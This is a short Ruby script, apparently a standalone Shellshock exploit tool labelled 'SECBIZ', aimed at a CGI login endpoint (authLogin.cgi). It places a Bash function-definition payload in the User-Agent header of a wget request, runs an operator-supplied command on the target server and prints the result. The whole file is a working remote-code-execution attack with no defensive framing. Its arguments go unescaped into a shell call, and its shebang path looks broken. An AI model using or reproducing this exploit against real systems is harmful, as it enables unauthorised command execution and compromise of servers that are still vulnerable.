...

#!/usr/env/ruby

# SECBIZ Shellshock Exploit

# Usage: shellshock-exploit.rb [ TARGET ] [ COMMAND ]

# 192.168.0.205:8080/cgi-bin/authLogin.cgi

target_host = ARGV[0]

cmd = ARGV[1]

payload = <<-TT

wget -O SSOUT -q -U "() { test;};echo \\"Content-type: text/plain\\"; echo; echo; #{cmd}" http://#{target_host}/cgi-bin/authLogin.cgi

TT

system(payload)

data = IO.read("SSOUT")

File.delete("SSOUT")

puts data.split("Content-type:").first.gsub(/^\n/, "")